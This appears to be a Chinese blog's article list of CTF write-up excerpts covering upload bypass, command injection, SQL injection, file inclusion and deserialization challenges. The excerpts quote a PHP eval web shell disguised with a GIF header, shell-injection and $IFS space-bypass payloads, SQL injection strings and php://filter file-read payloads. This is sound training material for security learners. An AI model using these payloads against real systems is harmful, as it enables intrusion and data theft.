自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(17)
  • 收藏
  • 关注

原创 [极客大挑战 2019]Upload

[极客大挑战 2019]Upload先上传一个php需要上传图片上传一个常规的一句话木马<?php @eval($_POST['shell']);?>过滤了’<?’那就上传一个GIF89a?<script language="php">eval($_REQUEST['shell']);</script> 文件名命名为2.phtml修改文件格式为图片发现响应页面没有提示上传成功,也没有报错,猜测上传路径是/upload/2.phtml

2021-05-13 18:03:04 99

原创 [极客大挑战 2019]PHP

[极客大挑战 2019]PHP看到备份,首先想到www.zip,或者可以用disearch 扫一下www.zip得到压缩包,解压后得到flag.php , index.php , class.php假的flagindex.php中发现这个这里存在反序列化看看class.php中的内容<?phpinclude 'flag.php';error_reporting(0);class Name{ private $username = 'nonono'; p

2021-05-13 17:32:53 242 1

原创 BUUCTF[RoarCTF 2019]Easy Calc

[RoarCTF 2019]Easy Calc查看源码$("#content").val():获取id为content的HTML标签元素的值,是JQuery,发现有calc.php,看看有什么这里显示了waf的过滤规则我们上传字符发现都被过滤了,这里考察的是PHP的字符串解析特性PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:1.删除空白符2.将某些字符转换为下划线(包括空格)利用这个特性,我们就可以在num前面加一个空格,然后就能绕过waf,执行

2020-12-23 17:56:20 146 1

原创 BUUCTF[ACTF2020 新生赛]Exec

[ACTF2020 新生赛]Exec直接ping127.0.0.1127.0.0.1;ls127.0.0.1;cat index.php发现什么都没有过滤没找到flag类似的文件,列出根目录下的文件127.0.0.1;ls /看到flag文件127.0.0.1;cat /flag得到flag

2020-12-20 16:44:02 638 2

原创 BUUCTF[GXYCTF2019]Ping Ping Ping

[GXYCTF2019]Ping Ping Ping直接ping 127.0.0.1有回显,ls一下发现flag.php,cat一下事情果然没有这么简单,这里空格被过滤了,下面有几种绕过空格的方法$IFS${IFS}$IFS$9 //$9改成 $ 加其他数字貌似都行<<>{cat,flag.php} //用逗号实现了空格功能%20 (space)%09(Tab)这里用 $IFS$9绕过空格之后,发现flag又被ban了,那就cat一下index.p

2020-12-19 20:43:35 240 2

原创 BUUCTF[极客大挑战 2019]LoveSQL

[极客大挑战 2019]LoveSQL用admin登录一下,发现用户名错误,那试一下admin’#发现登陆成功,看到这一串数字以为有什么特别的,其实没啥用但是能看到空格和#都是被url编码了的,这样才能有正确的回显,因此接下来的操作应该都是要对字符进行url编码的接下来我们用SQL注入来做1.首先查询字段数check.php?username=admin' order by 4%23&password=111(因为url没有自动对#进行编码,所以我们要手动输入#的url编码%23,

2020-12-17 18:24:46 260 2

原创 BUUCTF[ACTF2020 新生赛]Include

[ACTF2020 新生赛]Include有一个tips标签,指向的是?file=flag.php看到?file,应该首先想到的是文件包含先读取源码,构造payloadhttp://8cf4eecb-8bfa-4e2b-8616-b609fa0e7d3f.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=index.php发现了一串base64,解码得到<meta charset="utf8">

2020-12-17 12:35:39 210

原创 BUU-N1BOOK-Web

web入门[第一章 web入门]常见的信息搜集[第一章 web入门]粗心的小李[第一章 web入门]常见的信息搜集考查知识点:1.常规文件:robots.txt2.gedit备份文件3.vim备份文件首先看robots.txt:访问一下这个文件得到flag1再看一下原始文件ihdex.php,发现什么都没有,之前用dirsearch扫了很多东西出来,试了/.git发现也不对,这里就看到书上讲到了gedit备份文件,它是以 ~ 为后缀的,试试index.php~,有东西了,拿到flag

2020-12-11 17:09:35 1164 2

原创 UNCTF2020部分wp

目录MISC你能破解我的密码吗MISC你能破解我的密码吗拿到一个shadow文件,这是一个Linux下的文件,用记事本打开发现有一串奇怪的东西百度一个这个shadow文件我们这里的id=1,说明是md5加密的话不多少我们开始破解密码,这里有一篇文章几乎是一模一样/etc/shadow文件破解,密码破解,md5,SHA256,SHA512破解具体的操作也是相同,我也是在kali里面下载的,但是我的kali似乎不能连接到下载链接,所以我是在Windows里面下载好了john-1.9.0.ta

2020-11-28 01:15:59 338

原创 安洵杯2020部分MISC

安洵杯部分Misc签到王牌特工签到公众号回复fl4g,得到链接下载得到flag.docx,打开是一串表情编码直接在线emojicode解码得到flag:D0g3{Welc0m_ANd_H1T_liGht1y}附上网站:http://www.atoolbox.net/Tool.php?Id=937王牌特工得到一个findme文件,改后缀为zip,得到压缩包,里面有flagbox和key.txt感觉是比较有用的,txt有提示是VeraCrypt,用这个key去解密flagbox得到一个假的f

2020-11-27 12:50:23 399

原创 攻防世界-web进阶区

目录baby_webTraining-WWW-Robotsbaby_web题目描述:想想初始页面是哪个打开链接看到这个界面这里有两种解法法一:我们输入index.php ,就会立即跳转到1.php那我们就对index.php抓包看看在请求头看到flag:flag{very_baby_web}法二:题目提示说初始界面,但是url后面会自动跳转到1.php,我们可以在控制台找到初始界面, 按F12进入控制台点开原始的网址就可以看到Training-WWW-Robots打开链接是这样一个

2020-10-30 18:37:39 966

翻译 攻防世界-web新手区

view_source题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。两种方法:法一:在url(网址)前段加上view-source:即可,构造法二:只需要知道查看源码的快捷键是Ctrl+U即可get_post题目描述:X老师告诉小宁同学HTTP通常使用两种请求方法,你知道是哪两种吗?很简单,就是用post跟get两种传值方式,有问题一般就出在分不清两种传值方式。GET传值主要在url后面加个问号然后再传参,然后post一般在火狐浏览器用hackbar

2020-10-15 19:16:05 180

原创 BUUCTF[极客大挑战 2019]Secret File

#[极客大挑战 2019]Secret File打开网址是这个界面发现页面是黑色的背景,可能有东西被隐藏了,Ctrl+A全选一下试试果然有东西。发现了一句话在网页最后,点进去看看这里还有一个网页,点进去看看什么玩意,难道刚刚闪过去一个页面我没看到?倒过去看也什么都没看出来那可能是这样的,那就抓包一下果然有东西,发现了secr3t.php访问一下发现过滤了这些东西,但是没有过滤file,可以使用php的伪协议继续?file=php://filter/read=convert.b

2020-10-09 20:29:22 134

原创 BUUCTF[极客大挑战 2019]Havefun

[极客大挑战 2019]Havefun## 标题打开网址,发现什么也没有右键或者CTRL+U查看源码拉到最后发现了上图所示的代码块所以直接上传一个 ?cat=dog就得到了flag

2020-09-25 12:53:21 165 1

原创 BUUCTF[极客大挑战 2019]EasySQL

打开网址发现是一个登录网站,但是没有注册功能我么先输入一个用户名admin,再输入密码用单引号闭合1’试看,发现报错了,应该是字符型注入先使用万能密码登录,用户名随便输入,万能密码 1’or’1’='1果然得到了flag最后再补充一下万能密码有哪些...

2020-09-25 09:11:31 382

原创 BUUCTF[SUCTF 2019]EasySQL

利用原理:(1)补充系统变量@@sql_modesql_mode:是一组mysql支持的基本语法及校验规则PIPES_AS_CONCAT:将“||”视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数Concat相类似猜测后台sql语句为:select 接受的变量 || flag form flag;payload:1;set sql_mode=pipes_as_contact;select1;//闭合 //设置变量

2020-09-25 09:02:23 477 1

原创 BUUCTF[强网杯2019]随便注

[强网杯2019]随便注知识点:堆叠注入首先先输入一个1’,发现报错,再输入1’#,有回显,再输入1’ order by 2#,1’order by 3#,当输入3的时候发现无回显,说明注入点是2,但是当我们输入1’ union select 1,2#时,发现过滤了很多关键字,这时我们就要考虑堆叠注入我们输入1’; 发现下面出现了一条横线那应该是堆叠注入了,(什么是堆叠注入呢:在SQL中,分号是用来表示一条sql语句的结束。如果在 ; 结束一个sql语句后继续构造下一条语句,效果就是分别执行两

2020-09-23 00:48:08 521

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除